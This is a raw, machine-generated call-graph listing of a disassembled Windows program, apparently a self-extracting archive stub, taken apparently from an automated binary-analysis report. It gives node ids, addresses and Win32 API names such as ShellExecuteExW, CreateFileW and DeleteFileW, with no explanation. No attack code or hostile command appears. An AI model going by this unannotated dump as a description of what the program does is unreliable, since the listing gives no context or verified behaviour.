22981->22985 22983 4c9bad SetFilePointer 22983->22982 22984 4c9bcd GetLastError 22983->22984 22984->22982 22985->22983 24829 4d9b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24782 4e8050 8 API calls ___vcrt_uninitialize 24786 4dfc60 51 API calls 2 library calls 24788 4e3460 RtlUnwind 24789 4e9c60 71 API calls _free 24790 4e9e60 31 API calls 2 library calls 24791 4c1075 82 API calls pre_c_initialization 24792 4d5c77 121 API calls __vsnwprintf_l 24635 4dd573 24636 4dd580 24635->24636 24637 4cddd1 53 API calls 24636->24637 24638 4dd594 24637->24638 24639 4c400a _swprintf 51 API calls 24638->24639 24640 4dd5a6 SetDlgItemTextW 24639->24640 24641 4dac74 5 API calls 24640->24641 24642 4dd5c3 24641->24642 24646 4dc40e 24648 4dc4c7 24646->24648 24649 4dc42c _wcschr 24646->24649 24647 4dc4e5 24652 4dce22 18 API calls 24647->24652 24662 4dbe49 _wcsrchr 24647->24662 24648->24647 24648->24662 24681 4dce22 24648->24681 24649->24648 24655 4d17ac CompareStringW 24649->24655 24651 4daa36 ExpandEnvironmentStringsW 24651->24662 24652->24662 24653 4dca8d 24655->24649 24656 4dc11d SetWindowTextW 24656->24662 24659 4e35de 22 API calls 24659->24662 24661 4dbf0b SetFileAttributesW 24663 4dbfc5 GetFileAttributesW 24661->24663 24674 4dbf25 ___scrt_fastfail 24661->24674 24662->24651 24662->24653 24662->24656 24662->24659 24662->24661 24667 4dc2e7 GetDlgItem SetWindowTextW SendMessageW 24662->24667 24670 4dc327 SendMessageW 24662->24670 24675 4d17ac CompareStringW 24662->24675 24676 4d9da4 GetCurrentDirectoryW 24662->24676 24678 4ca52a 7 API calls 24662->24678 24679 4ca4b3 FindClose 24662->24679 24680 4dab9a 76 API calls new 24662->24680 24663->24662 24666 4dbfd7 DeleteFileW 24663->24666 24666->24662 24668 4dbfe8 24666->24668 24667->24662 24669 4c400a _swprintf 51 API calls 24668->24669 24671 4dc008 GetFileAttributesW 24669->24671 24670->24662 24671->24668 24672 4dc01d MoveFileW 24671->24672 24672->24662 24673 4dc035 MoveFileExW 24672->24673 24673->24662 24674->24662 24674->24663 24677 4cb4f7 52 API calls 2 library calls 24674->24677 24675->24662 24676->24662 24677->24674 24678->24662 24679->24662 24680->24662 24683 4dce2c ___scrt_fastfail 24681->24683 24682 4dd08a 24682->24647 24683->24682 24684 4dcf1b 24683->24684 24704 4d17ac CompareStringW 24683->24704 24686 4ca180 4 API calls 24684->24686 24687 4dcf30 24686->24687 24688 4dcf4f ShellExecuteExW 24687->24688 24705 4cb239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24687->24705 24688->24682 24695 4dcf62 24688->24695 24690 4dcf47 24690->24688 24691 4dcf9b 24706 4dd2e6 6 API calls 24691->24706 24692 4dcff1 CloseHandle 24693 4dcfff 24692->24693 24694 4dd00a 24692->24694 24707 4d17ac CompareStringW 24693->24707 24694->24682 24700 4dd081 ShowWindow 24694->24700 24695->24691 24695->24692 24697 4dcf91 ShowWindow 24695->24697 24697->24691 24699 4dcfb3 24699->24692 24701 4dcfc6 GetExitCodeProcess 24699->24701 24700->24682 24701->24692 24702 4dcfd9 24701->24702 24702->24692 24704->24684 24705->24690 24706->24699 24707->24694 24795 4dec0b 28 API calls 2 library calls 24833 4ddb0b 19 API calls ___delayLoadHelper2@8 24834 4c1f05 126 API calls __EH_prolog 24796 4dea00 46 API calls 6 library calls 24835 4ea918 27 API calls 2 library calls 24836 4dbe49 108 API calls 4 library calls 24837 4c6110 80 API calls 24838 4eb710 GetProcessHeap 24727 4c9f2f 24728 4c9f3d 24727->24728 24729 4c9f44 24727->24729 24730 4c9f4a GetStdHandle 24729->24730 24734 4c9f55 24729->24734 24730->24734 24731 4c9fa9 WriteFile 24731->24734 24732 4c9f7c WriteFile 24733 4c9f7a 24732->24733 24732->24734 24733->24732 24733->24734 24734->24728 24734->24731 24734->24732 24734->24733 24736 4ca031 24734->24736 24738 4c6e18 60 API calls 24734->24738 24739 4c7061 75 API calls 24736->24739 24738->24734 24739->24728 24797 4c1025 29 API calls pre_c_initialization 24843 4dbe49 103 API calls 4 library calls 24798 4da430 73 API calls 24799 4deac0 27 API calls pre_c_initialization 24849 4d97c0 10 API calls 24801 4e9ec0 21 API calls 24850 4eb5c0 GetCommandLineA GetCommandLineW 24802 4da8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24851 4eebc1 21 API calls __vsnwprintf_l 22987 4c10d5 22992 4c5bd7 22987->22992 22993 4c5be1 __EH_prolog 22992->22993 22999 4cb07d 22993->22999 22995 4c5bed 23005 4c5dcc GetCurrentProcess GetProcessAffinityMask 22995->23005 23000 4cb087 __EH_prolog 22999->23000 23006 4cea80 80 API calls 23000->23006 23002 4cb099 23007 4cb195 23002->23007 23006->23002 23008 4cb1a7 ___scrt_fastfail 23007->23008 23011 4d0948 23008->23011 23014 4d0908 GetCurrentProcess GetProcessAffinityMask 23011->23014 23015 4cb10f 23014->23015 23015->22995 24803 4dacd0 100 API calls 24855 4d19d0 26 API calls std::bad_exception::bad_exception 23018 4dead2 23019 4deade ___scrt_is_nonwritable_in_current_image 23018->23019 23044 4de5c7 23019->23044 23022 4deae5 23023 4deb0e 23022->23023 23124 4def05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23022->23124 23029 4deb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23023->23029 23055 4e824d 23023->23055 23027 4deb2d ___scrt_is_nonwritable_in_current_image 23028 4debad 23063 4df020 23028->23063 23029->23028 23125 4e7243 38 API calls 2 library calls 23029->23125 23039 4debd9 23041 4debe2 23039->23041 23126 4e764a 28 API calls _abort 23039->23126 23127 4de73e 13 API calls 2 library calls 23041->23127 23045 4de5d0 23044->23045 23128 4ded5b IsProcessorFeaturePresent 23045->23128 23047 4de5dc 23129 4e2016 23047->23129 23049 4de5e1 23050 4de5e5 23049->23050 23138 4e80d7 23049->23138 23050->23022 23053 4de5fc 23053->23022 23056 4e8264 23055->23056 23057 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23056->23057 23058 4deb27 23057->23058 23058->23027 23059 4e81f1 23058->23059 23060 4e8220 23059->23060 23061 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23060->23061 23062 4e8249 23061->23062 23062->23029 23188 4df350 23063->23188 23066 4debb3 23067 4e819e 23066->23067 23190 4eb290 23067->23190 23069 4e81a7 23071 4debbc 23069->23071 23194 4eb59a 38 API calls 23069->23194 23072 4dd5d4 23071->23072 23381 4d00cf 23072->23381 23076 4dd5f3 23430 4da335 23076->23430 23078 4dd5fc 23434 4d13b3 GetCPInfo 23078->23434 23080 4dd606 ___scrt_fastfail 23081 4dd619 GetCommandLineW 23080->23081 23082 4dd628 23081->23082 23083 4dd6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23081->23083 23437 4dbc84 23082->23437 23448 4c400a 23083->23448 23089 4dd636 OpenFileMappingW 23093 4dd64f MapViewOfFile 23089->23093 23094 4dd696 CloseHandle 23089->23094 23090 4dd6a0 23442 4dd287 23090->23442 23096 4dd68d UnmapViewOfFile 23093->23096 23097 4dd660 __vsnwprintf_l 23093->23097 23094->23083 23096->23094 23101 4dd287 2 API calls 23097->23101 23103 4dd67c 23101->23103 23102 4d8835 8 API calls 23104 4dd76a DialogBoxParamW 23102->23104 23103->23096 23105 4dd7a4 23104->23105 23106 4dd7bd 23105->23106 23107 4dd7b6 Sleep 23105->23107 23109 4dd7cb 23106->23109 23481 4da544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23106->23481 23107->23106 23110 4dd7ea DeleteObject 23109->23110 23111 4dd7ff DeleteObject 23110->23111 23112 4dd806 23110->23112 23111->23112 23113 4dd849 23112->23113 23114 4dd837 23112->23114 23478 4da39d 23113->23478 23482 4dd2e6 6 API calls 23114->23482 23117 4dd83d CloseHandle 23117->23113 23118 4dd883 23119 4e757e GetModuleHandleW 23118->23119 23120 4debcf 23119->23120 23120->23039 23121 4e76a7 23120->23121 23735 4e7424 23121->23735 23124->23022 23125->23028 23126->23041 23127->23027 23128->23047 23130 4e201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23129->23130 23142 4e310e 23130->23142 23134 4e203c 23134->23049 23135 4e2031 23135->23134 23156 4e314a DeleteCriticalSection 23135->23156 23137 4e2029 23137->23049 23184 4eb73a 23138->23184 23141 4e203f 8 API calls 3 library calls 23141->23050 23143 4e3117 23142->23143 23145 4e3140 23143->23145 23146 4e2025 23143->23146 23157 4e3385 23143->23157 23162 4e314a DeleteCriticalSection 23145->23162 23146->23137 23148 4e215c 23146->23148 23177 4e329a 23148->23177 23150 4e2166 23151 4e2171 23150->23151 23182 4e3348 6 API calls try_get_function 23150->23182 23151->23135 23153 4e217f 23154 4e218c 23153->23154 23183 4e218f 6 API calls ___vcrt_FlsFree 23153->23183 23154->23135 23156->23137 23163 4e3179 23157->23163 23160 4e33bc InitializeCriticalSectionAndSpinCount 23161 4e33a8 23160->23161 23161->23143 23162->23146 23164 4e31ad 23163->23164 23167 4e31a9 23163->23167 23164->23160 23164->23161 23165 4e31cd 23165->23164 23168 4e31d9 GetProcAddress 23165->23168 23167->23164 23167->23165 23170 4e3219 23167->23170 23169 4e31e9 __crt_fast_encode_pointer 23168->23169 23169->23164 23171 4e3241 LoadLibraryExW 23170->23171 23176 4e3236 23170->23176 23172 4e325d GetLastError 23171->23172 23175 4e3275 23171->23175 23173 4e3268 LoadLibraryExW 23172->23173 23172->23175 23173->23175 23174 4e328c FreeLibrary 23174->23176 23175->23174 23175->23176 23176->23167 23178 4e3179 try_get_function 5 API calls 23177->23178 23179 4e32b4 23178->23179 23180 4e32cc TlsAlloc 23179->23180 23181 4e32bd 23179->23181 23181->23150 23182->23153 23183->23151 23187 4eb753 23184->23187 23185 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23186 4de5ee 23185->23186 23186->23053 23186->23141 23187->23185 23189 4df033 GetStartupInfoW 23188->23189 23189->23066 23191 4eb299 23190->23191 23193 4eb2a2 23190->23193 23195 4eb188 23191->23195 23193->23069 23194->23069 23215 4e8fa5 GetLastError 23195->23215 23197 4eb195 23236 4eb2ae 23197->23236 23199 4eb19d 23245 4eaf1b 23199->23245 23204 4eb1f7 23270 4e84de 23204->23270 23208 4eb1f2 23269 4e895a 20 API calls __dosmaperr 23208->23269 23209 4eb1b4 23209->23193 23211 4eb23b 23211->23204 23276 4eadf1 26 API calls 23211->23276 23212 4eb20f 23212->23211 23213 4e84de _free 20 API calls 23212->23213 23213->23211 23216 4e8fbb 23215->23216 23217 4e8fc7 23215->23217 23277 4ea61b 11 API calls 2 library calls 23216->23277 23278 4e85a9 20 API calls 3 library calls 23217->23278 23220 4e8fc1 23220->23217 23222 4e9010 SetLastError 23220->23222 23221 4e8fd3 23228 4e8fdb 23221->23228 23279 4ea671 11 API calls 2 library calls 23221->23279 23222->23197 23224 4e84de _free 20 API calls 23226 4e8fe1 23224->23226 23225 4e8ff0 23227 4e8ff7 23225->23227 23225->23228 23229 4e901c SetLastError 23226->23229 23280 4e8e16 20 API calls __dosmaperr 23227->23280 23228->23224 23281 4e8566 38 API calls _abort 23229->23281 23231 4e9002 23233 4e84de _free 20 API calls 23231->23233 23235 4e9009 23233->23235 23235->23222 23235->23229 23237 4eb2ba ___scrt_is_nonwritable_in_current_image 23236->23237 23238 4e8fa5 _abort 38 API calls 23237->23238 23239 4eb2c4 23238->23239 23242 4eb348 ___scrt_is_nonwritable_in_current_image 23239->23242 23244 4e84de _free 20 API calls 23239->23244 23282 4e8566 38 API calls _abort 23239->23282 23283 4ea3f1 EnterCriticalSection 23239->23283 23284 4eb33f LeaveCriticalSection _abort 23239->23284 23242->23199 23244->23239 23285 4e3dd6 23245->23285 23248 4eaf4e 23250 4eaf65 23248->23250 23251 4eaf53 GetACP 23248->23251 23249 4eaf3c GetOEMCP 23249->23250 23250->23209 23252 4e8518 23250->23252 23251->23250 23253 4e8556 23252->23253 23257 4e8526 __dosmaperr 23252->23257 23296 4e895a 20 API calls __dosmaperr 23253->23296 23254 4e8541 RtlAllocateHeap 23256 4e8554 23254->23256 23254->23257 23256->23204 23259 4eb350 23256->23259 23257->23253 23257->23254 23295 4e71ad 7 API calls 2 library calls 23257->23295 23260 4eaf1b 40 API calls 23259->23260 23261 4eb36f 23260->23261 23263 4eb3c0 IsValidCodePage 23261->23263 23264 4eb3e5 ___scrt_fastfail 23261->23264 23267 4eb376 23261->23267 23262 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23265 4eb1ea 23262->23265 23266 4eb3d2 GetCPInfo 23263->23266 23263->23267 23297 4eaff4 GetCPInfo 23264->23297 23265->23208 23265->23212 23266->23264 23266->23267 23267->23262 23269->23204 23271 4e84e9 RtlFreeHeap 23270->23271 23272 4e8512 _free 23270->23272 23271->23272 23273 4e84fe 23271->23273 23272->23209 23380 4e895a 20 API calls __dosmaperr 23273->23380 23275 4e8504 GetLastError 23275->23272 23276->23204 23277->23220 23278->23221 23279->23225 23280->23231 23283->23239 23284->23239 23286 4e3de9 23285->23286 23287 4e3df3 23285->23287 23286->23248 23286->23249 23287->23286 23288 4e8fa5 _abort 38 API calls 23287->23288 23289 4e3e14 23288->23289 23293 4e90fa 38 API calls __cftof 23289->23293 23291 4e3e2d 23294 4e9127 38 API calls __cftof 23291->23294 23293->23291 23294->23286 23295->23257 23296->23256 23298 4eb0d8 23297->23298 23302 4eb02e 23297->23302 23301 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23298->23301 23304 4eb184 23301->23304 23307 4ec099 23302->23307 23304->23267 23306 4ea275 __vsnwprintf_l 43 API calls 23306->23298 23308 4e3dd6 __cftof 38 API calls 23307->23308 23309 4ec0b9 MultiByteToWideChar 23308->23309 23313 4ec0f7 23309->23313 23319 4ec18f 23309->23319 23311 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23315 4eb08f 23311->23315 23312 4ec118 __vsnwprintf_l ___scrt_fastfail 23316 4ec189 23312->23316 23318 4ec15d MultiByteToWideChar 23312->23318 23313->23312 23314 4e8518 __onexit 21 API calls 23313->23314 23314->23312 23321 4ea275 23315->23321 23326 4ea2c0 20 API calls _free 23316->23326 23318->23316 23320 4ec179 GetStringTypeW 23318->23320 23319->23311 23320->23316 23322 4e3dd6 __cftof 38 API calls 23321->23322 23323 4ea288 23322->23323 23327 4ea058 23323->23327 23326->23319 23328 4ea073 __vsnwprintf_l 23327->23328 23329 4ea099 MultiByteToWideChar 23328->23329 23330 4ea0c3 23329->23330 23331 4ea24d 23329->23331 23334 4e8518 __onexit 21 API calls 23330->23334 23337 4ea0e4 __vsnwprintf_l 23330->23337 23332 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23331->23332 23333 4ea260 23332->23333 23333->23306 23334->23337 23335 4ea12d MultiByteToWideChar 23336 4ea199 23335->23336 23338 4ea146 23335->23338 23363 4ea2c0 20 API calls _free 23336->23363 23337->23335 23337->23336 23354 4ea72c 23338->23354 23342 4ea1a8 23344 4e8518 __onexit 21 API calls 23342->23344 23349 4ea1c9 __vsnwprintf_l 23342->23349 23343 4ea170 23343->23336 23346 4ea72c __vsnwprintf_l 11 API calls 23343->23346 23344->23349 23345 4ea23e 23362 4ea2c0 20 API calls _free 23345->23362 23346->23336 23347 4ea72c __vsnwprintf_l 11 API calls 23350 4ea21d 23347->23350 23349->23345 23349->23347 23350->23345 23351 4ea22c WideCharToMultiByte 23350->23351 23351->23345 23352 4ea26c 23351->23352 23364 4ea2c0 20 API calls _free 23352->23364 23365 4ea458 23354->23365 23358 4ea79c LCMapStringW 23359 4ea75c 23358->23359 23360 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23359->23360 23361 4ea15d 23360->23361 23361->23336 23361->23342 23361->23343 23362->23336 23363->23331 23364->23336 23367 4ea484 23365->23367 23369 4ea488 23365->23369 23366 4ea4a8 23366->23369 23370 4ea4b4 GetProcAddress 23366->23370 23367->23366 23367->23369 23373 4ea4f4 23367->23373 23369->23359 23372 4ea7b4 10 API calls 3 library calls 23369->23372 23371 4ea4c4 __crt_fast_encode_pointer 23370->23371 23371->23369 23372->23358 23374 4ea515 LoadLibraryExW 23373->23374 23379 4ea50a 23373->23379 23375 4ea54a 23374->23375 23376 4ea532 GetLastError 23374->23376 23378 4ea561 FreeLibrary 23375->23378 23375->23379 23376->23375 23377 4ea53d LoadLibraryExW 23376->23377 23377->23375 23378->23379 23379->23367 23380->23275 23483 4de360 23381->23483 23384 4d0154 23388 4d0484 GetModuleFileNameW 23384->23388 23494 4e70dd 42 API calls __vsnwprintf_l 23384->23494 23385 4d00f0 GetProcAddress 23386 4d0109 23385->23386 23387 4d0121 GetProcAddress 23385->23387 23386->23387 23387->23384 23389 4d0133 23387->23389 23401 4d04a3 23388->23401 23389->23384 23391 4d03be 23391->23388 23392 4d03c9 GetModuleFileNameW CreateFileW 23391->23392 23393 4d03fc SetFilePointer 23392->23393 23394 4d0478 CloseHandle 23392->23394 23393->23394 23395 4d040c ReadFile 23393->23395 23394->23388 23395->23394 23398 4d042b 23395->23398 23398->23394 23400 4d0085 2 API calls 23398->23400 23399 4d04d2 CompareStringW 23399->23401 23400->23398 23401->23399 23402 4d0508 GetFileAttributesW 23401->23402 23403 4d0520 23401->23403 23485 4cacf5 23401->23485 23488 4d0085 23401->23488 23402->23401 23402->23403 23404 4d052a 23403->23404 23407 4d0560 23403->23407 23406 4d0542 GetFileAttributesW 23404->23406 23408 4d055a 23404->23408 23405 4d066f 23429 4d9da4 GetCurrentDirectoryW 23405->23429 23406->23404 23406->23408 23407->23405 23409 4cacf5 GetVersionExW 23407->23409 23408->23407 23410 4d057a 23409->23410 23411 4d05e7 23410->23411 23412 4d0581 23410->23412 23413 4c400a _swprintf 51 API calls 23411->23413 23414 4d0085 2 API calls 23412->23414 23415 4d060f AllocConsole 23413->23415 23416 4d058b 23414->23416 23417 4d061c GetCurrentProcessId AttachConsole 23415->23417 23418 4d0667 ExitProcess 23415->23418 23419 4d0085 2 API calls 23416->23419 23498 4e35b3 23417->23498 23420 4d0595 23419->23420 23495 4cddd1 23420->23495 23423 4d063d GetStdHandle WriteConsoleW Sleep FreeConsole 23423->23418 23425 4c400a _swprintf 51 API calls 23426 4d05c3 23425->23426 23427 4cddd1 53 API calls 23426->23427 23428 4d05d2 23427->23428 23428->23418 23429->23076 23431 4d0085 2 API calls 23430->23431 23432 4da349 OleInitialize 23431->23432 23433 4da36c GdiplusStartup SHGetMalloc 23432->23433 23433->23078 23435 4d13d7 IsDBCSLeadByte 23434->23435 23435->23435 23436 4d13ef 23435->23436 23436->23080 23439 4dbc8e 23437->23439 23438 4dbda4 23438->23089 23438->23090 23439->23438 23440 4d179d CharUpperW 23439->23440 23523 4cecad 80 API calls ___scrt_fastfail 23439->23523 23440->23439 23443 4de360 23442->23443 23444 4dd294 SetEnvironmentVariableW 23443->23444 23446 4dd2b7 23444->23446 23445 4dd2df 23445->23083 23446->23445 23447 4dd2d3 SetEnvironmentVariableW 23446->23447 23447->23445 23524 4c3fdd 23448->23524 23451 4daded LoadBitmapW 23452 4dae0e 23451->23452 23456 4dae15 23451->23456 23558 4d9e1c FindResourceW 23452->23558 23454 4dae1b GetObjectW 23455 4dae2a 23454->23455 23553 4d9d1a 23455->23553 23456->23454 23456->23455 23459 4dae80 23470 4cd31c 23459->23470 23460 4dae5c 23574 4d9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23460->23574 23461 4d9e1c 13 API calls 23463 4dae4d 23461->23463 23463->23460 23465 4dae53 DeleteObject 23463->23465 23464 4dae64 23575 4d9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23464->23575 23465->23460 23467 4dae6d 23576 4d9f5d 8 API calls ___scrt_fastfail 23467->23576 23469 4dae74 DeleteObject 23469->23459 23587 4cd341 23470->23587 23472 4cd328 23627 4cda4e GetModuleHandleW FindResourceW 23472->23627 23475 4d8835 23726 4de24a 23475->23726 23479 4da3cc GdiplusShutdown CoUninitialize 23478->23479 23479->23118 23481->23109 23482->23117 23484 4d00d9 GetModuleHandleW 23483->23484 23484->23384 23484->23385 23486 4cad09 GetVersionExW 23485->23486 23487 4cad45 23485->23487 23486->23487 23487->23401 23489 4de360 23488->23489 23490 4d0092 GetSystemDirectoryW 23489->23490 23491 4d00c8 23490->23491 23492 4d00aa 23490->23492 23491->23401 23493 4d00bb LoadLibraryW 23492->23493 23493->23491 23494->23391 23500 4cddff 23495->23500 23499 4e35bb 23498->23499 23499->23423 23499->23499 23506 4cd28a 23500->23506 23503 4cddfc 23503->23425 23504 4cde22 LoadStringW 23504->23503 23505 4cde39 LoadStringW 23504->23505 23505->23503 23511 4cd1c3 23506->23511 23508 4cd2a7 23509 4cd2bc 23508->23509 23519 4cd2c8 26 API calls 23508->23519 23509->23503 23509->23504 23512 4cd1de 23511->23512 23518 4cd1d7 _strncpy 23511->23518 23513 4cd202 23512->23513 23520 4d1596 WideCharToMultiByte 23512->23520 23515 4cd233 23513->23515 23521 4cdd6b 50 API calls __vsnprintf 23513->23521 23522 4e58d9 26 API calls 3 library calls 23515->23522 23518->23508 23519->23509 23520->23513 23521->23515 23522->23518 23523->23439 23525 4c3ff4 __vswprintf_c_l 23524->23525 23528 4e5759 23525->23528 23531 4e3837 23528->23531 23532 4e385f 23531->23532 23533 4e3877 23531->23533 23548 4e895a 20 API calls __dosmaperr 23532->23548 23533->23532 23534 4e387f 23533->23534 23536 4e3dd6 __cftof 38 API calls 23534->23536 23538 4e388f 23536->23538 23537 4e3864 23549 4e8839 26 API calls pre_c_initialization 23537->23549 23550 4e3da1 20 API calls 2 library calls 23538->23550 23540 4e386f 23542 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23540->23542 23544 4c3ffe SetEnvironmentVariableW GetModuleHandleW LoadIconW 23542->23544 23543 4e3907 23551 4e4186 51 API calls 4 library calls 23543->23551 23544->23451 23547 4e3912 23552 4e3e59 20 API calls _free 23547->23552 23548->23537 23549->23540 23550->23543 23551->23547 23552->23540 23577 4d9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23553->23577 23555 4d9d21 23557 4d9d2d 23555->23557 23578 4d9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23555->23578 23557->23459 23557->23460 23557->23461 23559 4d9e70 23558->23559 23560 4d9e3e SizeofResource 23558->23560 23559->23456 23560->23559 23561 4d9e52 LoadResource 23560->23561 23561->23559 23562 4d9e63 LockResource 23561->23562 23562->23559 23563 4d9e77 GlobalAlloc 23562->23563 23563->23559 23564 4d9e92 GlobalLock 23563->23564 23565 4d9f21 GlobalFree 23564->23565 23566 4d9ea1 __vsnwprintf_l 23564->23566 23565->23559 23567 4d9ea9 CreateStreamOnHGlobal 23566->23567 23568 4d9f1a GlobalUnlock 23567->23568 23569 4d9ec1 23567->23569 23568->23565 23579 4d9d7b GdipAlloc 23569->23579 23572 4d9eef GdipCreateHBITMAPFromBitmap 23573 4d9f05 23572->23573 23573->23568 23574->23464 23575->23467 23576->23469 23577->23555 23578->23557 23580 4d9d8d 23579->23580 23582 4d9d9a 23579->23582 23583 4d9b0f 23580->23583 23582->23568 23582->23572 23582->23573 23584 4d9b37 GdipCreateBitmapFromStream 23583->23584 23585 4d9b30 GdipCreateBitmapFromStreamICM 23583->23585 23586 4d9b3c 23584->23586 23585->23586 23586->23582 23588 4cd34b _wcschr __EH_prolog 23587->23588 23589 4cd37a GetModuleFileNameW 23588->23589 23590 4cd3ab 23588->23590 23591 4cd394 23589->23591 23629 4c99b0 23590->23629 23591->23590 23594 4cd407 23640 4e5a90 26 API calls 3 library calls 23594->23640 23597 4d3781 76 API calls 23599 4cd3db 23597->23599 23598 4cd41a 23641 4e5a90 26 API calls 3 library calls 23598->23641 23599->23594 23599->23597 23611 4cd627 23599->23611 23601 4cd563 23601->23611 23666 4c9d30 77 API calls 23601->23666 23605 4cd57d new 23606 4c9bf0 80 API calls 23605->23606 23605->23611 23609 4cd5a6 new 23606->23609 23608 4cd42c 23608->23601 23608->23611 23642 4c9e40 23608->23642 23657 4c9bf0 23608->23657 23665 4c9d30 77 API calls 23608->23665 23609->23611 23624 4cd5b2 new 23609->23624 23667 4d137a MultiByteToWideChar 23609->23667 23650 4c9653 23611->23650 23612 4cd72b 23668 4cce72 76 API calls 23612->23668 23614 4cda0a 23673 4cce72 76 API calls 23614->23673 23616 4cd9fa 23616->23472 23617 4cd771 23669 4e5a90 26 API calls 3 library calls 23617->23669 23619 4d3781 76 API calls 23621 4cd742 23619->23621 23620 4cd78b 23670 4e5a90 26 API calls 3 library calls 23620->23670 23621->23617 23621->23619 23623 4d1596 WideCharToMultiByte 23623->23624 23624->23611 23624->23612 23624->23614 23624->23616 23624->23623 23671 4cdd6b 50 API calls __vsnprintf 23624->23671 23672 4e58d9 26 API calls 3 library calls 23624->23672 23628 4cd32f 23627->23628 23628->23475 23630 4c99ba 23629->23630 23631 4c9a39 CreateFileW 23630->23631 23632 4c9a59 GetLastError 23631->23632 23633 4c9aaa 23631->23633 23674 4cb66c 23632->23674 23634 4c9ae1 23633->23634 23636 4c9ac7 SetFileTime 23633->23636 23634->23599 23636->23634 23637 4c9a79 23637->23633 23638 4c9a7d CreateFileW GetLastError 23637->23638 23639 4c9aa1 23638->23639 23639->23633 23640->23598 23641->23608 23643 4c9e64 SetFilePointer 23642->23643 23644 4c9e53 23642->23644 23645 4c9e9d 23643->23645 23646 4c9e82 GetLastError 23643->23646 23644->23645 23687 4c6fa5 75 API calls 23644->23687 23645->23608 23646->23645 23648 4c9e8c 23646->23648 23648->23645 23688 4c6fa5 75 API calls 23648->23688 23651 4c9688 23650->23651 23652 4c9677 23650->23652 23651->23472 23652->23651 23653 4c968a 23652->23653 23654 4c9683 23652->23654 23694 4c96d0 23653->23694 23689 4c9817 23654->23689 23659 4c9c03 23657->23659 23660 4c9bfc 23657->23660 23659->23660 23661 4c9c9e 23659->23661 23664 4c9cc0 23659->23664 23709 4c984e 23659->23709 23660->23608 23661->23660 23721 4c6f6b 75 API calls 23661->23721 23663 4c984e 5 API calls 23663->23664 23664->23660 23664->23663 23665->23608 23666->23605 23667->23624 23668->23621 23669->23620 23670->23611 23671->23624 23672->23624 23673->23616 23675 4cb679 23674->23675 23683 4cb683 23675->23683 23684 4cb806 CharUpperW 23675->23684 23677 4cb692 23685 4cb832 CharUpperW 23677->23685 23679 4cb6a1 23680 4cb71c GetCurrentDirectoryW 23679->23680 23681 4cb6a5 23679->23681 23680->23683 23686 4cb806 CharUpperW 23681->23686 23683->23637 23684->23677 23685->23679 23686->23683 23687->23643 23688->23645 23690 4c9824 23689->23690 23691 4c9820 23689->23691 23690->23691 23700 4ca12d 23690->23700 23691->23651 23695 4c96dc 23694->23695 23697 4c96fa 23694->23697 23695->23697 23698 4c96e8 CloseHandle 23695->23698 23696 4c9719 23696->23651 23697->23696 23708 4c6e3e 74 API calls 23697->23708 23698->23697 23701 4de360 23700->23701 23702 4ca13a DeleteFileW 23701->23702 23703 4ca14d 23702->23703 23704 4c984c 23702->23704 23705 4cb66c 2 API calls 23703->23705 23704->23651 23706 4ca161 23705->23706 23706->23704 23707 4ca165 DeleteFileW 23706->23707 23707->23704 23708->23696 23710 4c985c GetStdHandle 23709->23710 23711 4c9867 ReadFile 23709->23711 23710->23711 23712 4c98a0 23711->23712 23713 4c9880 23711->23713 23712->23659 23722 4c9989 23713->23722 23715 4c9887 23716 4c9895 23715->23716 23717 4c98a8 GetLastError 23715->23717 23718 4c98b7 23715->23718 23719 4c984e GetFileType 23716->23719 23717->23712 23717->23718 23718->23712 23720 4c98c7 GetLastError 23718->23720 23719->23712 23720->23712 23720->23716 23721->23660 23723 4c998f 23722->23723 23724 4c9992 GetFileType 23722->23724 23723->23715 23725 4c99a0 23724->23725 23725->23715 23729 4de24f new 23726->23729 23727 4d8854 23727->23102 23729->23727 23732 4e71ad 7 API calls 2 library calls 23729->23732 23733 4decce RaiseException __CxxThrowException@8 new 23729->23733 23734 4decb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23729->23734 23732->23729 23736 4e7430 _abort 23735->23736 23737 4e7448 23736->23737 23738 4e757e _abort GetModuleHandleW 23736->23738 23757 4ea3f1 EnterCriticalSection 23737->23757 23740 4e743c 23738->23740 23740->23737 23769 4e75c2 GetModuleHandleExW 23740->23769 23743 4e7450 23752 4e74ee 23743->23752 23754 4e74c5 23743->23754 23777 4e7f30 20 API calls _abort 23743->23777 23745 4e750b 23761 4e753d 23745->23761 23746 4e7537 23778 4f1a19 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23746->23778 23747 4e81f1 _abort 5 API calls 23747->23752 23751 4e81f1 _abort 5 API calls 23756 4e74dd 23751->23756 23758 4e752e 23752->23758 23754->23751 23754->23756 23756->23747 23757->23743 23779 4ea441 LeaveCriticalSection 23758->23779 23760 4e7507 23760->23745 23760->23746 23780 4ea836 23761->23780 23764 4e756b 23767 4e75c2 _abort 8 API calls 23764->23767 23765 4e754b GetPEB 23765->23764 23766 4e755b GetCurrentProcess TerminateProcess 23765->23766 23766->23764 23768 4e7573 ExitProcess 23767->23768 23770 4e760f 23769->23770 23771 4e75ec GetProcAddress 